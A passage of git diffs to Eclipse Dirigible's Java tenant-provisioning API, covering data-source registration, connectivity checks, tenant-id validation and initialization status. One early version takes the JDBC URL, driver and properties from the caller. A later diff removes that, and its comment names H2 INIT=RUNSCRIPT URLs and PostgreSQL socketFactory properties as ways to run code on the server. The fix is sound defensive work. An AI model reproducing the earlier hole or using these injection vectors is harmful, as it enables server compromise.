+@RolesAllowed({TenantProvisioningRoles.TENANT_PROVISIONER, TenantProvisioningRoles.ADMINISTRATOR, TenantProvisioningRoles.OPERATOR})
+@Conditional(TenantProvisioningApiEnabledCondition.class)
+class TenantDataSourceProvisioningEndpoint extends BaseEndpoint {
+
+    /** The registration service. */
+    private final TenantRegistrationService registrationService;
+
+    /** The data source registration service. */
+    private final TenantDataSourceRegistrationService dataSourceRegistrationService;
+
+    /**
+     * Instantiates a new tenant data source provisioning endpoint.
+     *
+     * @param registrationService the tenant registration service
+     * @param dataSourceRegistrationService the data source registration service
+     */
+    TenantDataSourceProvisioningEndpoint(TenantRegistrationService registrationService,
+            TenantDataSourceRegistrationService dataSourceRegistrationService) {
+        this.registrationService = registrationService;
+        this.dataSourceRegistrationService = dataSourceRegistrationService;
+    }
+
+    /**
+     * Registers or updates the tenant's default data source.
+     *
+     * @param tenantId the tenant id
+     * @param parameter the credentials
+     * @return 201 when the data source was created, 200 when it was updated
+     */
+    @PutMapping("/default")
+    ResponseEntity<Void> registerDefaultDataSource(@PathVariable("tenantId") String tenantId,
+            @Valid @RequestBody TenantDataSourceParameter parameter) {
+        Tenant tenant = registrationService.requireTenant(tenantId);
+        boolean created = dataSourceRegistrationService.register(tenant, parameter);
+        return ResponseEntity.status(created ? HttpStatus.CREATED : HttpStatus.OK)
+                             .build();
+    }
+}

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantDataSourceRegistrationService.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantDataSourceRegistrationService.java
@@ -1,0 +1,261 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning.external;
+
+import java.sql.Connection;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+import java.util.ArrayList;
+import java.util.List;
+import java.util.Optional;
+
+import org.eclipse.dirigible.components.base.artefact.ArtefactLifecycle;
+import org.eclipse.dirigible.components.base.artefact.ArtefactPhase;
+import org.eclipse.dirigible.components.data.sources.config.DefaultDataSourceName;
+import org.eclipse.dirigible.components.data.sources.domain.DataSource;
+import org.eclipse.dirigible.components.data.sources.domain.DataSourceProperty;
+import org.eclipse.dirigible.components.data.sources.manager.DataSourceInitializer;
+import org.eclipse.dirigible.components.data.sources.manager.DataSourcesManager;
+import org.eclipse.dirigible.components.data.sources.manager.TenantDataSourceNameManager;
+import org.eclipse.dirigible.components.data.sources.service.DataSourceService;
+import org.eclipse.dirigible.components.database.DirigibleDataSource;
+import org.eclipse.dirigible.components.tenants.domain.Tenant;
+import org.eclipse.dirigible.components.tenants.tenant.TenantFactory;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.context.annotation.Conditional;
+import org.springframework.http.HttpStatus;
+import org.springframework.stereotype.Service;
+import org.springframework.web.server.ResponseStatusException;
+
+/**
+ * Registers the data source of an externally provisioned tenant.
+ *
+ * <p>
+ * The definition is a clone of the application's own default data source with the tenant's
+ * credentials and schema put in its place - the same shape the built-in provisioner produces, so
+ * everything downstream resolves it exactly as it resolves a tenant it created itself.
+ *
+ * <p>
+ * Two things make the upsert honest. An already-initialized connection pool does not notice that
+ * its definition changed - only removing it closes it - so a re-registration that carried a rotated
+ * password would otherwise keep serving the old one until the next restart; the pool is therefore
+ * always evicted. And the credentials are tried before they are stored, through the platform's own
+ * initialization rather than a bare JDBC call, so the check exercises the very pool the application
+ * will use, driver resolution and connection properties included. A check that fails leaves nothing
+ * behind: the caller gets the database's own complaint and can register again.
+ */
+@Service
+@Conditional(TenantProvisioningApiEnabledCondition.class)
+class TenantDataSourceRegistrationService {
+
+    /** The Constant LOGGER. */
+    private static final Logger LOGGER = LoggerFactory.getLogger(TenantDataSourceRegistrationService.class);
+
+    /** The location the built-in provisioner uses as well, so both kinds of tenant look alike. */
+    private static final String LOCATION = "TENANT_DEFAULT";
+
+    /** Marks the data sources this API registered. */
+    private static final String CREATED_BY = "TENANT_PROVISIONING_API";
+
+    /** The data sources manager. */
+    private final DataSourcesManager dataSourcesManager;
+
+    /** The data source service. */
+    private final DataSourceService dataSourceService;
+
+    /** The data source initializer. */
+    private final DataSourceInitializer dataSourceInitializer;
+
+    /** The tenant data source name manager. */
+    private final TenantDataSourceNameManager tenantDataSourceNameManager;
+
+    /** The tenant factory. */
+    private final TenantFactory tenantFactory;
+
+    /** The default data source name. */
+    private final String defaultDataSourceName;
+
+    /**
+     * Instantiates a new tenant data source registration service.
+     *
+     * @param dataSourcesManager the data sources manager
+     * @param dataSourceService the data source service
+     * @param dataSourceInitializer the data source initializer
+     * @param tenantDataSourceNameManager the tenant data source name manager
+     * @param tenantFactory the tenant factory
+     * @param defaultDataSourceName the default data source name
+     */
+    TenantDataSourceRegistrationService(DataSourcesManager dataSourcesManager, DataSourceService dataSourceService,
+            DataSourceInitializer dataSourceInitializer, TenantDataSourceNameManager tenantDataSourceNameManager,
+            TenantFactory tenantFactory, @DefaultDataSourceName String defaultDataSourceName) {
+        this.dataSourcesManager = dataSourcesManager;
+        this.dataSourceService = dataSourceService;
+        this.dataSourceInitializer = dataSourceInitializer;
+        this.tenantDataSourceNameManager = tenantDataSourceNameManager;
+        this.tenantFactory = tenantFactory;
+        this.defaultDataSourceName = defaultDataSourceName;
+    }
+
+    /**
+     * Registers or updates the tenant's default data source.
+     *
+     * @param tenant the tenant
+     * @param parameter the credentials
+     * @return true when the data source was created rather than updated
+     */
+    boolean register(Tenant tenant, TenantDataSourceParameter parameter) {
+        String name = tenantDataSourceName(tenant);
+        Optional<DataSource> existing = dataSourceService.findOptionalByName(name);
+
+        DataSource dataSource = existing.orElseGet(DataSource::new);
+        applyDefinition(dataSource, name, tenant, parameter);
+
+        // A live pool keeps the credentials it was built with, whatever the definition says.
+        dataSourceInitializer.removeInitializedDataSource(name);
+
+        if (parameter.isVerifyConnectivity()) {
+            verifyConnectivity(dataSource);
+        }
+
+        dataSourceService.save(dataSource);
+        LOGGER.info("Data source [{}] of tenant [{}] has been {}.", name, tenant.getId(), existing.isPresent() ? "updated" : "registered");
+        return existing.isEmpty();
+    }
+
+    /**
+     * Whether the tenant's data source is registered - the precondition of an activation.
+     *
+     * @param tenant the tenant
+     * @return true, if the data source is registered
+     */
+    boolean isRegistered(Tenant tenant) {
+        return dataSourceService.findOptionalByName(tenantDataSourceName(tenant))
+                                .isPresent();
+    }
+
+    /**
+     * The name of the tenant's default data source, by the platform's own convention.
+     *
+     * @param tenant the tenant
+     * @return the name
+     */
+    String tenantDataSourceName(Tenant tenant) {
+        return tenantDataSourceNameManager.createName(tenantFactory.createFromEntity(tenant), defaultDataSourceName);
+    }
+
+    /**
+     * Fills the definition from the application's default data source and the supplied credentials.
+     *
+     * @param dataSource the definition to fill, existing or new
+     * @param name the data source name
+     * @param tenant the tenant
+     * @param parameter the credentials
+     */
+    private void applyDefinition(DataSource dataSource, String name, Tenant tenant, TenantDataSourceParameter parameter) {
+        DataSource defaults = dataSourcesManager.getDataSourceDefinition(defaultDataSourceName);
+
+        dataSource.setName(name);
+        dataSource.setLocation(LOCATION);
+        dataSource.setType(DataSource.ARTEFACT_TYPE);
+        dataSource.setDescription(defaultDataSourceName + " for tenant " + tenant.getId());
+        dataSource.setCreatedBy(CREATED_BY);
+        dataSource.setLifecycle(ArtefactLifecycle.CREATED);
+        dataSource.setPhase(ArtefactPhase.CREATE);
+
+        dataSource.setUsername(parameter.getUsername());
+        dataSource.setPassword(parameter.getPassword());
+        dataSource.setSchema(parameter.getSchema());
+        dataSource.setUrl(parameter.getUrl() != null ? parameter.getUrl() : defaults.getUrl());
+        dataSource.setDriver(parameter.getDriver() != null ? parameter.getDriver() : defaults.getDriver());
+        dataSource.setProperties(properties(dataSource, parameter, defaults));
+
+        dataSource.updateKey();
+    }
+
+    /**
+     * The connection properties: the caller's when it supplied any, otherwise the default data
+     * source's.
+     *
+     * @param dataSource the owning definition
+     * @param parameter the credentials
+     * @param defaults the application's default data source
+     * @return the properties
+     */
+    private List<DataSourceProperty> properties(DataSource dataSource, TenantDataSourceParameter parameter, DataSource defaults) {
+        List<DataSourceProperty> properties = new ArrayList<>();
+        if (parameter.getProperties() != null) {
+            parameter.getProperties()
+                     .forEach(p -> properties.add(property(dataSource, p.getName(), p.getValue())));
+        } else if (defaults.getProperties() != null) {
+            defaults.getProperties()
+                    .forEach(p -> properties.add(property(dataSource, p.getName(), p.getValue())));
+        }
+        return properties;
+    }
+
+    /**
+     * Property.
+     *
+     * @param dataSource the data source
+     * @param name the name
+     * @param value the value
+     * @return the data source property
+     */
+    private static DataSourceProperty property(DataSource dataSource, String name, String value) {
+        DataSourceProperty property = new DataSourceProperty();
+        property.setName(name);
+        property.setValue(value);
+        property.setDatasource(dataSource);
+        return property;
+    }
+
+    /**
+     * Opens a connection with the supplied credentials and runs a trivial query.
+     *
+     * <p>
+     * Through the platform's own initializer rather than {@code DriverManager}, so what is proven is
+     * that the pool the application will use can be built and can connect. The pool stays initialized
+     * afterwards - it is the correct one either way - and is dropped again when the check fails.
+     *
+     * @param dataSource the definition to try
+     */
+    private void verifyConnectivity(DataSource dataSource) {
+        try {
+            DirigibleDataSource initialized = dataSourceInitializer.initialize(dataSource);
+            try (Connection connection = initialized.getConnection(); Statement statement = connection.createStatement()) {
+                try (ResultSet resultSet = statement.executeQuery("SELECT 1")) {
+                    resultSet.next();
+                }
+            }
+        } catch (SQLException | RuntimeException ex) {
+            dataSourceInitializer.removeInitializedDataSource(dataSource.getName());
+            LOGGER.warn("Failed to connect to the database of data source [{}] with the supplied credentials.", dataSource.getName(), ex);
+            throw new ResponseStatusException(HttpStatus.BAD_GATEWAY, "Could not connect to the database of data source ["
+                    + dataSource.getName() + "] with the supplied credentials: " + rootMessage(ex));
+        }
+    }
+
+    /**
+     * The database's own complaint is usually the innermost one; the wrappers around it say nothing a
+     * caller can act on.
+     *
+     * @param ex the exception
+     * @return the message of its root cause
+     */
+    private static String rootMessage(Throwable ex) {
+        Throwable root = ex;
+        while (root.getCause() != null && root.getCause() != root) {
+            root = root.getCause();
+        }
+        return root.getMessage();
+    }
+}

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantDataSourceRegistrationService.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantDataSourceRegistrationService.java
@@ -10,9 +10,7 @@
 package org.eclipse.dirigible.components.tenants.provisioning.external;
 
 import java.sql.Connection;
-import java.sql.ResultSet;
 import java.sql.SQLException;
-import java.sql.Statement;
 import java.util.ArrayList;
 import java.util.List;
 import java.util.Optional;
@@ -50,8 +48,9 @@ import org.springframework.web.server.ResponseStatusException;
  * password would otherwise keep serving the old one until the next restart; the pool is therefore
  * always evicted. And the credentials are tried before they are stored, through the platform's own
  * initialization rather than a bare JDBC call, so the check exercises the very pool the application
- * will use, driver resolution and connection properties included. A check that fails leaves nothing
- * behind: the caller gets the database's own complaint and can register again.
+ * will use - driver resolution, connection properties and the database's own validation query
+ * included. A check that fails leaves nothing behind: the caller gets the database's own complaint
+ * and can register again.
  */
 @Service
 @Conditional(TenantProvisioningApiEnabledCondition.class)
@@ -65,6 +64,9 @@ class TenantDataSourceRegistrationService {
 
     /** Marks the data sources this API registered. */
     private static final String CREATED_BY = "TENANT_PROVISIONING_API";
+
+    /** How long the driver may take to answer whether a connection is usable. Hikari's own default. */
+    private static final int VALIDATION_TIMEOUT_SECONDS = 5;
 
     /** The data sources manager. */
     private final DataSourcesManager dataSourcesManager;
@@ -219,21 +221,35 @@ class TenantDataSourceRegistrationService {
     }
 
     /**
-     * Opens a connection with the supplied credentials and runs a trivial query.
+     * Opens a connection with the supplied credentials and asks the driver whether it is usable.
      *
      * <p>
      * Through the platform's own initializer rather than {@code DriverManager}, so what is proven is
-     * that the pool the application will use can be built and can connect. The pool stays initialized
-     * afterwards - it is the correct one either way - and is dropped again when the check fails.
+     * that the pool the application will use can be built and can connect. Building it is already most
+     * of the answer: the pool validates its first connection while it is being constructed, using
+     * whichever mechanism is right for that database - the {@code connectionTestQuery} a
+     * {@code DatabaseConfigurator} registered, or {@link Connection#isValid(int)} where none did.
+     *
+     * <p>
+     * Deliberately <b>no SQL of our own</b>. A hand-written {@code SELECT 1} looks portable and is not:
+     * SAP HANA needs {@code SELECT 1 FROM DUMMY} - which is exactly why
+     * {@code HanaDatabaseConfigurator} sets that as its test query - and Derby needs a {@code FROM}
+     * clause too. Issuing a statement here would walk past the per-database knowledge the platform
+     * already has and refuse working credentials on those systems. {@link Connection#isValid(int)} is
+     * the JDBC-standard question, asked of the driver rather than of the SQL dialect.
+     *
+     * <p>
+     * The pool stays initialized afterwards - it is the correct one either way - and is dropped again
+     * when the check fails.
      *
      * @param dataSource the definition to try
      */
     private void verifyConnectivity(DataSource dataSource) {
         try {
             DirigibleDataSource initialized = dataSourceInitializer.initialize(dataSource);
-            try (Connection connection = initialized.getConnection(); Statement statement = connection.createStatement()) {
-                try (ResultSet resultSet = statement.executeQuery("SELECT 1")) {
-                    resultSet.next();
+            try (Connection connection = initialized.getConnection()) {
+                if (!connection.isValid(VALIDATION_TIMEOUT_SECONDS)) {
+                    throw new SQLException("The driver does not consider the connection usable");
                 }
             }
         } catch (SQLException | RuntimeException ex) {

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantDataSourceRegistrationService.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantDataSourceRegistrationService.java
@@ -124,11 +124,11 @@ class TenantDataSourceRegistrationService {
         // A live pool keeps the credentials it was built with, whatever the definition says.
         dataSourceInitializer.removeInitializedDataSource(name);
 
-        if (parameter.isVerifyConnectivity()) {
-            verifyConnectivity(dataSource);
-        }
+        verifyConnectivity(dataSource);
+        // Saving initializes the pool as well, through a data source lifecycle listener, so a failure
+        // here is the same kind of failure and has to reach the caller the same way - not as a 500.
+        failAsBadGateway(dataSource, () -> dataSourceService.save(dataSource));
 
-        dataSourceService.save(dataSource);
         LOGGER.info("Data source [{}] of tenant [{}] has been {}.", name, tenant.getId(), existing.isPresent() ? "updated" : "registered");
         return existing.isEmpty();
     }
@@ -176,28 +176,27 @@ class TenantDataSourceRegistrationService {
         dataSource.setUsername(parameter.getUsername());
         dataSource.setPassword(parameter.getPassword());
         dataSource.setSchema(parameter.getSchema());
-        dataSource.setUrl(parameter.getUrl() != null ? parameter.getUrl() : defaults.getUrl());
-        dataSource.setDriver(parameter.getDriver() != null ? parameter.getDriver() : defaults.getDriver());
-        dataSource.setProperties(properties(dataSource, parameter, defaults));
+
+        // Never from the caller: a JDBC URL and driver properties are executable surface - an H2 URL
+        // carrying INIT=RUNSCRIPT, a PostgreSQL socketFactory property - so taking them from a request
+        // would let whoever may register a tenant's credentials run code on this server instead.
+        dataSource.setUrl(defaults.getUrl());
+        dataSource.setDriver(defaults.getDriver());
+        dataSource.setProperties(copyProperties(dataSource, defaults));
 
         dataSource.updateKey();
     }
 
     /**
-     * The connection properties: the caller's when it supplied any, otherwise the default data
-     * source's.
+     * The connection properties of the application's own data source, copied onto the tenant's.
      *
      * @param dataSource the owning definition
-     * @param parameter the credentials
      * @param defaults the application's default data source
      * @return the properties
      */
-    private List<DataSourceProperty> properties(DataSource dataSource, TenantDataSourceParameter parameter, DataSource defaults) {
+    private List<DataSourceProperty> copyProperties(DataSource dataSource, DataSource defaults) {
         List<DataSourceProperty> properties = new ArrayList<>();
-        if (parameter.getProperties() != null) {
-            parameter.getProperties()
-                     .forEach(p -> properties.add(property(dataSource, p.getName(), p.getValue())));
-        } else if (defaults.getProperties() != null) {
+        if (defaults.getProperties() != null) {
             defaults.getProperties()
                     .forEach(p -> properties.add(property(dataSource, p.getName(), p.getValue())));
         }
@@ -245,19 +244,46 @@ class TenantDataSourceRegistrationService {
      * @param dataSource the definition to try
      */
     private void verifyConnectivity(DataSource dataSource) {
-        try {
+        failAsBadGateway(dataSource, () -> {
             DirigibleDataSource initialized = dataSourceInitializer.initialize(dataSource);
             try (Connection connection = initialized.getConnection()) {
                 if (!connection.isValid(VALIDATION_TIMEOUT_SECONDS)) {
                     throw new SQLException("The driver does not consider the connection usable");
                 }
             }
+        });
+    }
+
+    /**
+     * Runs work that touches the tenant's database and turns any failure into the answer this API owes
+     * a caller: the status that says "your credentials did not work" and the database's own words.
+     *
+     * @param dataSource the definition being registered
+     * @param work the work to run
+     */
+    private void failAsBadGateway(DataSource dataSource, SqlWork work) {
+        try {
+            work.run();
         } catch (SQLException | RuntimeException ex) {
             dataSourceInitializer.removeInitializedDataSource(dataSource.getName());
             LOGGER.warn("Failed to connect to the database of data source [{}] with the supplied credentials.", dataSource.getName(), ex);
             throw new ResponseStatusException(HttpStatus.BAD_GATEWAY, "Could not connect to the database of data source ["
                     + dataSource.getName() + "] with the supplied credentials: " + rootMessage(ex));
         }
+    }
+
+    /**
+     * Work that may fail the way a database fails.
+     */
+    @FunctionalInterface
+    private interface SqlWork {
+
+        /**
+         * Run.
+         *
+         * @throws SQLException if the database refuses
+         */
+        void run() throws SQLException;
     }
 
     /**

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantIds.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantIds.java
@@ -1,0 +1,60 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning.external;
+
+import java.util.regex.Pattern;
+
+/**
+ * What a caller-supplied tenant id may look like.
+ *
+ * <p>
+ * The id is supplied by the caller rather than generated, because one tenant is the same customer
+ * in every application of a landscape, and it then travels into places that constrain its alphabet:
+ * it is the default subdomain, it is the prefix of the tenant's data source name, and - under the
+ * token groups resolution strategy - it is the first segment of the identity provider group name
+ * {@code <tenantId>.<appId>.<role>}. A dot would make that group name unparseable, so a tenant
+ * granted by such a group could never be entered.
+ *
+ * <p>
+ * A DNS label covers all three: letters, digits and inner hyphens, at most 63 characters. Rejecting
+ * at registration is the only place where the answer is still cheap - afterwards the id is spread
+ * across the identity provider, the database and the data source registry.
+ */
+final class TenantIds {
+
+    /** A DNS label: no dots, no leading or trailing hyphen, 1 to 63 characters. */
+    private static final Pattern VALID = Pattern.compile("^[a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?$");
+
+    /**
+     * Checks if the given tenant id is valid.
+     *
+     * @param tenantId the tenant id, may be null
+     * @return true, if the id may be used as a tenant id
+     */
+    static boolean isValid(String tenantId) {
+        return tenantId != null && VALID.matcher(tenantId)
+                                        .matches();
+    }
+
+    /**
+     * The reason a caller gets when the id is refused.
+     *
+     * @param tenantId the refused tenant id
+     * @return the message
+     */
+    static String invalidMessage(String tenantId) {
+        return "Invalid tenant id [" + tenantId
+                + "]. A tenant id must be a DNS label - letters, digits and inner hyphens, at most 63 characters - and must not contain a dot,"
+                + " since it is also the tenant's subdomain, the prefix of its data source name and the first segment of the identity provider"
+                + " group names <tenantId>.<appId>.<role>.";
+    }
+
+    private TenantIds() {}
+}

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantIds.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantIds.java
@@ -44,6 +44,24 @@ final class TenantIds {
     }
 
     /**
+     * The reason a caller gets when a subdomain is refused.
+     *
+     * <p>
+     * A subdomain is held to the same alphabet as an id, and for a reason of its own: under the
+     * {@code SUBDOMAIN} resolution strategy it is matched out of a request's host name, so anything
+     * that is not a DNS label could never be matched. Refusing it here also keeps arbitrary text - line
+     * breaks included - out of the values this API logs and stores.
+     *
+     * @param subdomain the refused subdomain
+     * @return the message
+     */
+    static String invalidSubdomainMessage(String subdomain) {
+        return "Invalid subdomain [" + subdomain
+                + "]. A subdomain must be a DNS label - letters, digits and inner hyphens, at most 63 characters - since it is matched out of"
+                + " a request's host name.";
+    }
+
+    /**
      * The reason a caller gets when the id is refused.
      *
      * @param tenantId the refused tenant id

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantInitializationState.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantInitializationState.java
@@ -1,0 +1,29 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning.external;
+
+/**
+ * The initialization of a tenant, as a caller sees it.
+ *
+ * @param status how far it has got
+ * @param error why it failed, or null
+ */
+public record TenantInitializationState(InitializationStatus status, String error) {
+
+    /**
+     * A state without an error detail.
+     *
+     * @param status the status
+     * @return the state
+     */
+    static TenantInitializationState of(InitializationStatus status) {
+        return new TenantInitializationState(status, null);
+    }
+}

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantInitializationStatusCalculator.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantInitializationStatusCalculator.java
@@ -9,21 +9,75 @@
  */
 package org.eclipse.dirigible.components.tenants.provisioning.external;
 
+import java.util.ArrayList;
+import java.util.List;
+
+import org.eclipse.dirigible.components.base.artefact.Artefact;
+import org.eclipse.dirigible.components.base.artefact.ArtefactLifecycle;
+import org.eclipse.dirigible.components.base.synchronizer.MultitenantSynchronizers;
+import org.eclipse.dirigible.components.base.synchronizer.Synchronizer;
+import org.eclipse.dirigible.components.initializers.definition.Definition;
+import org.eclipse.dirigible.components.initializers.definition.DefinitionService;
+import org.eclipse.dirigible.components.initializers.definition.DefinitionState;
 import org.eclipse.dirigible.components.tenants.domain.Tenant;
 import org.eclipse.dirigible.components.tenants.domain.TenantStatus;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
 import org.springframework.context.annotation.Conditional;
 import org.springframework.stereotype.Component;
 
 /**
- * Derives how far a tenant's initialization has got.
+ * Derives how far the initialization of a tenant has got.
  *
  * <p>
- * Derived, never tracked: there is no run registry to consult, so the answer is the same on every
- * node of a cluster and survives a restart.
+ * Derived, never tracked. Activation blanks the checksums of every definition that is materialized
+ * per tenant and lets the synchronizers reprocess them; a definition whose checksum is still blank
+ * is one the pass has not reached yet. Both halves of that - the blanking and the reprocessing -
+ * are durable rows in the system database that every node of a cluster shares, so the answer here
+ * is the same from any instance and survives a restart, without a run registry that could disagree
+ * with reality.
+ *
+ * <p>
+ * Failure is read from both places it can appear. A definition that could not be parsed is recorded
+ * as {@code BROKEN} with its message; an artefact that parsed but could not be materialized - a
+ * table the tenant's user may not create, say - is recorded on the artefact itself as
+ * {@code FAILED} or {@code FATAL} with its error. Watching only the definitions would miss exactly
+ * the failure this API exists to report, because materializing into the tenant's schema is the part
+ * that involves the externally created credentials.
+ *
+ * <p>
+ * Two properties of the signal are deliberate and worth knowing. It is batch-wide: tenants
+ * activated within one synchronization window share it, so each reads {@code IN_PROGRESS} until the
+ * window closes, and a definition error is reported to all of them because definition errors are
+ * global. And an instance that has no per-tenant artefacts at all has nothing to materialize, so it
+ * answers {@code COMPLETED} at once - which is the truth for such a deployment.
  */
 @Component
 @Conditional(TenantProvisioningApiEnabledCondition.class)
 class TenantInitializationStatusCalculator {
+
+    /** The Constant LOGGER. */
+    private static final Logger LOGGER = LoggerFactory.getLogger(TenantInitializationStatusCalculator.class);
+
+    /** How many failures are quoted before the detail is truncated. */
+    private static final int MAX_REPORTED_ERRORS = 20;
+
+    /** The multitenant synchronizers. */
+    private final MultitenantSynchronizers multitenantSynchronizers;
+
+    /** The definition service. */
+    private final DefinitionService definitionService;
+
+    /**
+     * Instantiates a new tenant initialization status calculator.
+     *
+     * @param multitenantSynchronizers the multitenant synchronizers
+     * @param definitionService the definition service
+     */
+    TenantInitializationStatusCalculator(MultitenantSynchronizers multitenantSynchronizers, DefinitionService definitionService) {
+        this.multitenantSynchronizers = multitenantSynchronizers;
+        this.definitionService = definitionService;
+    }
 
     /**
      * Calculate the initialization state of a tenant.
@@ -35,6 +89,89 @@ class TenantInitializationStatusCalculator {
         if (TenantStatus.PROVISIONED != tenant.getStatus()) {
             return TenantInitializationState.of(InitializationStatus.NOT_STARTED);
         }
+
+        List<Definition> definitions = definitionService.findByTypes(multitenantSynchronizers.getArtefactTypes());
+        if (definitions.stream()
+                       .anyMatch(TenantInitializationStatusCalculator::isAwaitingProcessing)) {
+            return TenantInitializationState.of(InitializationStatus.IN_PROGRESS);
+        }
+
+        List<String> errors = collectErrors(definitions);
+        if (!errors.isEmpty()) {
+            LOGGER.debug("Initialization of tenant [{}] is failed with [{}] error(s).", tenant.getId(), errors.size());
+            return new TenantInitializationState(InitializationStatus.FAILED, describe(errors));
+        }
         return TenantInitializationState.of(InitializationStatus.COMPLETED);
+    }
+
+    /**
+     * Whether the synchronizers still owe this definition a pass.
+     *
+     * <p>
+     * A blank checksum is the mark the activation leaves; the pass replaces it with the real one as
+     * soon as it collects the definition. A deleted definition never gets one back - its source file is
+     * gone - so it is excluded, or a single removed artefact would leave every later activation
+     * reporting progress forever.
+     *
+     * @param definition the definition
+     * @return true, if the definition has not been reprocessed yet
+     */
+    private static boolean isAwaitingProcessing(Definition definition) {
+        if (DefinitionState.DELETED == definition.getState()) {
+            return false;
+        }
+        String checksum = definition.getChecksum();
+        return checksum == null || checksum.isBlank();
+    }
+
+    /**
+     * Everything that went wrong, from the definitions and from the artefacts they produced.
+     *
+     * @param definitions the multitenant definitions
+     * @return the failures
+     */
+    private List<String> collectErrors(List<Definition> definitions) {
+        List<String> errors = new ArrayList<>();
+        definitions.stream()
+                   .filter(definition -> DefinitionState.BROKEN == definition.getState())
+                   .forEach(definition -> errors.add(
+                           definition.getType() + " [" + definition.getLocation() + "]: " + definition.getMessage()));
+
+        for (Synchronizer<?, ?> synchronizer : multitenantSynchronizers.getSynchronizers()) {
+            for (Artefact artefact : readArtefacts(synchronizer)) {
+                if (ArtefactLifecycle.FAILED == artefact.getLifecycle() || ArtefactLifecycle.FATAL == artefact.getLifecycle()) {
+                    errors.add(artefact.getType() + " [" + artefact.getLocation() + "]: " + artefact.getError());
+                }
+            }
+        }
+        return errors;
+    }
+
+    /**
+     * Reads one artefact type. A type whose table cannot be read - an engine switched off on this
+     * instance, say - must not turn the whole answer into an error of its own.
+     *
+     * @param synchronizer the synchronizer
+     * @return its artefacts, empty when they cannot be read
+     */
+    private List<? extends Artefact> readArtefacts(Synchronizer<?, ?> synchronizer) {
+        try {
+            return synchronizer.getService()
+                               .getAll();
+        } catch (RuntimeException ex) {
+            LOGGER.warn("Failed to read the artefacts of [{}] while calculating the initialization status.", synchronizer, ex);
+            return List.of();
+        }
+    }
+
+    /**
+     * Describe.
+     *
+     * @param errors the errors
+     * @return a detail a caller can act on, bounded in size
+     */
+    private static String describe(List<String> errors) {
+        String detail = String.join("; ", errors.subList(0, Math.min(errors.size(), MAX_REPORTED_ERRORS)));
+        return errors.size() > MAX_REPORTED_ERRORS ? detail + "; and " + (errors.size() - MAX_REPORTED_ERRORS) + " more" : detail;
     }
 }

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantInitializationStatusCalculator.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantInitializationStatusCalculator.java
@@ -1,0 +1,40 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning.external;
+
+import org.eclipse.dirigible.components.tenants.domain.Tenant;
+import org.eclipse.dirigible.components.tenants.domain.TenantStatus;
+import org.springframework.context.annotation.Conditional;
+import org.springframework.stereotype.Component;
+
+/**
+ * Derives how far a tenant's initialization has got.
+ *
+ * <p>
+ * Derived, never tracked: there is no run registry to consult, so the answer is the same on every
+ * node of a cluster and survives a restart.
+ */
+@Component
+@Conditional(TenantProvisioningApiEnabledCondition.class)
+class TenantInitializationStatusCalculator {
+
+    /**
+     * Calculate the initialization state of a tenant.
+     *
+     * @param tenant the tenant
+     * @return the state
+     */
+    TenantInitializationState calculate(Tenant tenant) {
+        if (TenantStatus.PROVISIONED != tenant.getStatus()) {
+            return TenantInitializationState.of(InitializationStatus.NOT_STARTED);
+        }
